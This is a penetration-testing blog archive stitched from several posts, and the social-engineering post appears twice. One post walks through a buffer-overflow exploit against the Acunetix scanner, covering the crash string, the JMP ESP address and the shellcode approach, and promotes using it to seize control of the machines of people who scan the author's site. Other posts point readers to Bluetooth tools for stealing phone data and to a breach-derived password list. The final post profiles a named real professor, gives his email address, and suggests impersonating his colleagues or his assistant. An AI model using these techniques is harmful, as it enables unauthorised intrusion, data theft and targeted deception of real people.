Category Archives: Penetration Testing

That article revealed a new vulnerability that gave attackers, the ability to perform spoofing attack.

Many people wrote to me about the problems of that kind of article (for example).

So this time I’m goanna reveal a new 0DAY that will help security managers to protect their web sites against many vulnerability scans.

A lot of sites owners will tell you that the majority numbers of scans, performed against their sites, are performed by automatic tools like NESSUS, ACUNETIX, and APPSCAN.

Today 0DAY will be focused on one of the most popular web scan in the world, ACUNETIX.

The POC will be against ACUNETIX 8 (build 20120704 since it’s one of the most common cracked version which was published in the net and used by many newbie hackers).

This disclosure will not only reveal a new vulnerability, but demonstrates a whole new perception of dealing with external attacks.

Instead of protecting your web sites again and again, or buying a new advanced WAF (web application firewall), let’s give the attackers a reason to be afraid, reason to think twice before they press the “SCAN” button.

In this article, I will not give a full working exploit for all scan scenarios nor for all operating systems, but a proof of concept that hopefully will grow into a new effort of research for vulnerabilities in Penetration test tools.

So let’s get our hands dirty

ACUNETIX is a powerful tool for scanning and finding vulnerabilities at websites.

Many newbie attackers tend to use this tool due to the simplicity of its use.

ACUNETIX offers its users a simple wizard base scan that covers many aspects of the vulnerability scan.

One of the aspects is the ability to scan more domains or sub domains related to the scanned website.
For example, if we scan my blog “http://an7isec.blogspot.co.il”, we will get the result shown below:
After a little research about this option, I figured out that ACUNETIX starts its wizard by sending an HTTP request to the site and learning about it from its HTTP response.

Furthermore the wizard learns about the external related domains from the external sources that appear at the website, for example:

“<img src=http://externalSource.com/someimg.png >”

“<a href=http://externalSource.com/ ></a>”

Etc…

Further Analysis reveals that if one of the external domain name length is more than 268 Byte’s, ACUNETIX will be crashed , so if we want to cause a crash, all we need to do is to put some kind of external source at our site, which have the length of 268 Byte’s or more, say something like this:
<A href= “http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAA”>

Quick view of this application in Immunity Debugger reveals that EDX was corrupted by the fuzzing string which caused access violation:

Despite the fact that further writing runs over the Structured Exaction Handler (SEH) as you will probably notice ,my advice for you is not to go that way, believe me I tried it for several days with no success (because of the safe SHE mechanism).

However, we have another problem with this exploit, In one word, “ASCII”.

ACUNETIX gets its information about external domains as a URL.

This fact causing the string to be converted into Web Browser friendly string.

500f = 0x66303035 : readable memory location for fixing the flow of the application that was corrupted by the buffer overflow.

]Qy~ = 0x7e79515d (JMP ESP from SXS.DLL).

OK, right now we are at the semifinal stage, running the application against above payload, produced the next result:

Yea… we landed exactly at the beginning of the final payload.

The next step will be to use suitable windows shell that will be made only from URL string (limited ASCII).

Such shell can be generated with “ Metasploit ” and it is called “Alphanumeric Shell”.

The important thing to remember while using such payload, is that the payload’s start address must be presented at one of the registers. If the payload presents at ESP, the first OP CODE of the shell need to be “PUSH ESP”.

In my Proof of concept, I used simple “CALC.EXE” shell code generated by “Metasploit that led me to the final stage which is ;working exploit!!

Moreover, our exploit is successfully bypassing DEP protection, simply by choosing only the addresses that aren’t compiled with DEP.

And due to the fact that ACUNETIX itself is not complied with DEP, this exploit should work perfectly on windows XP.

After successfully reaching all our goals, Let’s look on the final working exploit:

Following all the above, we created a powerful exploit that Newbie hackers

will definitely fall for.

This exploit will give us the ability to do everything with all that nasty Newbie hackers that scan our sites day and night, killing our traffic, filling all the web site forms with junk and so on…

Furthermore it can be used in order to collect smart intelligence about hostile forces who want to attack our web application.

BUT!!

The more powerful idea that motivated me to reveal this concept and POC, is the fact that this exploit is Anonymity killer! , because even if the attacker uses the most smart and secure proxy in the world, such as “TOR” and others, his ass will be revealed and full control on his scanning machine will be gained.
The exploit can be download from here.

A very good and important point. Right? If you are a software tester or a QA engineer then you must be thinking every minute to find a bug in an application. And you should be!

I think finding a blocker bug like any system crash is often rewarding! No I don’t think like that. You should try to find out the bugs that are most difficult to find and those always misleads users.

Finding such a subtle bugs is most challenging work and it gives you satisfaction of your work. Also it should be rewarded by seniors. I will share my experience of one such subtle bug that was not only difficult to catch but was difficult to reproduce also.
I was testing one module from my search engine project. I do most of the activities of this project manually as it is a bit complex to automate. That module consist of traffic and revenue stats of different affiliates and advertisers. So testing such a reports is always a difficult task. When I tested this report it was showing the data accurately processed for some time but when tried to test again after some time it was showing misleading results. It was strange and confusing to see the results.

There was a cron (cron is a automated script that runs after specified time or condition) to process the log files and update the database. Such multiple crons are running on log files and DB to synchronize the total data. There were two crons running on one table with some time intervals. There was a column in table that was getting overwritten by other cron making some data inconsistency. It took us long time to figure out the problem due to the vast DB processes and different crons.

My point is try to find out the hidden bugs in the system that might occur for special conditions and causes strong impact on the system. You can find such a bugs with some tips and tricks.

So what are those tips:

1)Understand the whole application or module in depth before starting the testing.

2) Prepare good test cases before start to testing. I mean give stress on the functional test cases which includes major risk of the application.

3) Create a sufficient test data before tests, this data set include the test case conditions and also the database records if you are going to test DB related application.

4) Perform repeated tests with different test environment.

5) Try to find out the result pattern and then compare your results with those patterns.

6) When you think that you have completed most of the test conditions and when you think you are tired somewhat then do some monkey testing.

————

7) Use your previous test data pattern to analyse the current set of tests.

8) Try some standard test cases for which you found the bugs in some different application. Like if you are testing input text box try inserting some html tags as the inputs and see the output on display page.

9) Last and the best trick is try very hard to find the bug .As if you are testing only to break the application!

You must have seen in movies that a HACKER accessing mobile phones to steal their important data. Bluetooth hacking is the most popular way to hack or to steal data from any phone.

There are lot of tools and softwares available on internet that can be used to hack any phone.

One of the most popular ways to transfer data between two mobile devices, in range, is via Bluetooth. But Bluetooth just like any other wireless network is prone to attackers. Bluetooth hacking could be classified into the following ways.

BlueJacking

BlueSnarfing

BlueBugging

In this post I have outlined only some Bluetooth hacking software.

1. Bluescanner :

The first thing one would need in bluetooth hacking, is to identify all the devices ahve their blutooth turned on. Bluescanner is a tool for windows OS , which help in discovering the Bluetooth devices as well as tries to get all the information for a newly discovered device.

2. Super Bluetooth Hack

This is one of the best tool used in hacking and is used to read information and controlling any phone with remote cell phone via Bluetooth.The Phone call list and SMS can be stored in the HTML type. In addition, it can also show the information about the battery, Sim network and many more.

If you want to download the software (Super Bluetooth Hack) simply download it and use it. It is quite easy to use. Follow these steps to install SBH(Super Bluetooth hack) directly to your phone :

1.Go to m.brothersoft.com.

2.Find Quick Download Page link at the bottom of the page.

3.Enter this Code: 127249

4. And your download will start Automatically.

3. BTbrowser

It is a J2ME mobile application which offers the same functionality similar to that BlueScanner.With this tool you can the browse and explore files. This application works on phones , which support JSR-82 such as Nokia 6600 and Sony Ericssion P900. Download

4. BTCrawler

The BT Crawler is a device scanner for window Based mobiles. It can also perform other bluetooth hacking techniques, namely Bluesnarfing and bluejacking, to vulnerable bluetooth devices in range.

The information gathering steps of footprinting and scanning are the most importance before hacking. Good information gathering can make the difference between a successful penetration test and one that has failed to provide maximum benefit to the client.

We can say that Information is a weapon, a successful penetration testing and a hacking process need a lots of relevant information that is why, information gathering so called foot printing is the first step of hacking. So, gathering valid login names and emails are one of the most important parts for penetration testing.

TheHarvester has been developed in Python by Christian Martorella. It is a tool which provides us information of about e-mail accounts, user names and hostnames/subdomains from different public sources like search engines and PGP key server.

This tool is designed to help the penetration tester on an earlier stage; it is an effective, simple and easy to use. The sources supported are:

Google – emails, subdomains/hostnames

Google profiles – Employee names

Bing search – emails, subdomains/hostnames, virtual hosts

Pgp servers – emails, subdomains/hostnames

LinkedIn – Employee names

Exalead – emails, subdomain/hostnames

New features:

Time delays between requests

XML results export

Search a domain in all sources

Virtual host verifier

Getting Started:

If you are using kali linux, go the terminal and use the command theharvester.

The list contains every wordlist, dictionary, and password database leak that the creator could find on the internet (and he spent a LOT of time looking). It also contains every word in the Wikipedia databases (pages-articles, retrieved 2010, all languages) as well as lots of books from Project Gutenberg. It also includes the passwords from some low-profile database breaches that were being sold in the underground years ago.

The format of the list is a standard text file sorted in non-case-sensitive alphabetical order. Lines are separated with a newline “\n” character.

You can test the list without downloading it by giving SHA256 hashes to the free hash cracker or to @PlzCrack on twitter. Here’s a tool for computing hashes easily. Here are the results of cracking LinkedIn’s and eHarmony’s password hash leaks with the list.

The list is responsible for cracking about 30% of all hashes given to CrackStation’s free hash cracker, but that figure should be taken with a grain of salt because some people try hashes of really weak passwords just to test the service, and others try to crack their hashes with other online hash crackers before finding CrackStation. Using the list, we were able to crack 49.98% of one customer’s set of 373,000 human password hashes to motivate their move to a better salting scheme.

The key to a successful social engineering engagement is trust.If you are able to win the trust of someone else easily then you can obtain any information you want.Also people are suspicious when they don’t know someone and they are not so open when you are going to ask for something about them or their company.However if you have done your research and you are giving them information that have valid grounds then you might be able to convince them and win their trust faster.In this article we will see how we can create a profile for someone who we don’t know.

Let’s say that our client is the MIT(Massachusetts Institute of Technology) and we don’t have any information about them.As a first step is to discover email addresses and profiles that exist on social media networks.We have two options in this step.We can use either the tool theHarvester or we can use the metasploit module calledsearch_email_collector.

The use of the email collector module of the metasploit framework is pretty simple.We just need to set the domain of our target and it will automatically search through Bing,Yahoo and Google for valid email addresses.

Our target in this case is the MIT so the domain that we want to set is the mit.edu.Below is a sample of our results.

From the other hand the tool theHarvester is providing us with more options.So except of the fact that we can scan for email addresses,we can scan also for profiles in social media like Google+ and Linkedin.In the next image you can see the command that we have executed in the tool.

Below is a sample of the email addresses that the tool theHarvester has discovered.Of course we can combine the results with the module of the metasploit if we wish.

We can try also to scan for profiles related to the mit.edu into professional social networks like Linkedin.We have discovered 2 profiles.

So we have a lot of email addresses and two names.Comparing the results with the metasploit module email collector we have identify that there is an email address that is probably corresponds to the Walter Lewin profile.The email address is lewin@mit.eduand you can see it in the results below.

Now that we have a name and an email address it is much more easier to search the web in order to collect as much information as possible about this particular person.For example we can start by checking his Linkedin profile.

We can use the email address lewin@mit.edu to discover his Facebook profile.

The information that we can retrieve without being friends on Facebook with is limited.However if we impersonate ourselves as a teacher of MIT we can send a friend request and we might be able to convince him with this way to add us to his friend list so we can have access to much more personal information.Another good tool for obtaining information is through the website pipl.com.

As you can see we have discovered information about the age,the job,the personal web space,his Amazon wish list and a website that contains the profile about this professor.Also from the same search we have manage to find his work phone number and his office room.

We can verify the above details by simply discovering his personal web page of the MIT.

From the above image except of the phone numbers and the addresses we have discovered also and the assistant of this professor.This can help us in many ways like:we are sending him an email pretending that it comes from his assistant.The professor will think that it came from a person that he trusts so he will respond to our questions more easily.

Basically the idea when constructing a profile of the person that you will use your social engineering skills is to have as much information as possible about his interests and activities,his friends and colleagues,emails and phone numbers etc.Keeping all that information on your notebook will help you to construct an ideal scenario that will work.

Conclusion

Exposure of personal information is an advantage for every social engineer guy.Every information that you will post on the Internet eventually it will stay forever.So before you post something personal think twice if it is really necessary to allow other people to know about my self and my activities.Also using different email addresses and usernames will make the work of social engineers much more difficult.

Disclaimer

Pentestlab appreciates highly the professor Mr. Walter Lewin and respects his work and contribution to the science and doesn’t encourage in any way his readers to use this personal information in order to perform illegal activities against this person.

SOURCE:

The key to a successful social engineering engagement is trust.If you are able to win the trust of someone else easily then you can obtain any information you want.Also people are suspicious when they don’t know someone and they are not so open when you are going to ask for something about them or their company.However if you have done your research and you are giving them information that have valid grounds then you might be able to convince them and win their trust faster.In this article we will see how we can create a profile for someone who we don’t know.

Let’s say that our client is the MIT(Massachusetts Institute of Technology) and we don’t have any information about them.As a first step is to discover email addresses and profiles that exist on social media networks.We have two options in this step.We can use either the tool theHarvester or we can use the metasploit module calledsearch_email_collector.

The use of the email collector module of the metasploit framework is pretty simple.We just need to set the domain of our target and it will automatically search through Bing,Yahoo and Google for valid email addresses.

Our target in this case is the MIT so the domain that we want to set is the mit.edu.Below is a sample of our results.

From the other hand the tool theHarvester is providing us with more options.So except of the fact that we can scan for email addresses,we can scan also for profiles in social media like Google+ and Linkedin.In the next image you can see the command that we have executed in the tool.

Below is a sample of the email addresses that the tool theHarvester has discovered.Of course we can combine the results with the module of the metasploit if we wish.

We can try also to scan for profiles related to the mit.edu into professional social networks like Linkedin.We have discovered 2 profiles.

So we have a lot of email addresses and two names.Comparing the results with the metasploit module email collector we have identify that there is an email address that is probably corresponds to the Walter Lewin profile.The email address is lewin@mit.eduand you can see it in the results below.

Now that we have a name and an email address it is much more easier to search the web in order to collect as much information as possible about this particular person.For example we can start by checking his Linkedin profile.

We can use the email address lewin@mit.edu to discover his Facebook profile.

The information that we can retrieve without being friends on Facebook with is limited.However if we impersonate ourselves as a teacher of MIT we can send a friend request and we might be able to convince him with this way to add us to his friend list so we can have access to much more personal information.Another good tool for obtaining information is through the website pipl.com.

As you can see we have discovered information about the age,the job,the personal web space,his Amazon wish list and a website that contains the profile about this professor.Also from the same search we have manage to find his work phone number and his office room.

We can verify the above details by simply discovering his personal web page of the MIT.

From the above image except of the phone numbers and the addresses we have discovered also and the assistant of this professor.This can help us in many ways like:we are sending him an email pretending that it comes from his assistant.The professor will think that it came from a person that he trusts so he will respond to our questions more easily.

Basically the idea when constructing a profile of the person that you will use your social engineering skills is to have as much information as possible about his interests and activities,his friends and colleagues,emails and phone numbers etc.Keeping all that information on your notebook will help you to construct an ideal scenario that will work.

Conclusion

Exposure of personal information is an advantage for every social engineer guy.Every information that you will post on the Internet eventually it will stay forever.So before you post something personal think twice if it is really necessary to allow other people to know about my self and my activities.Also using different email addresses and usernames will make the work of social engineers much more difficult.

Disclaimer

Pentestlab appreciates highly the professor Mr. Walter Lewin and respects his work and contribution to the science and doesn’t encourage in any way his readers to use this personal information in order to perform illegal activities against this person.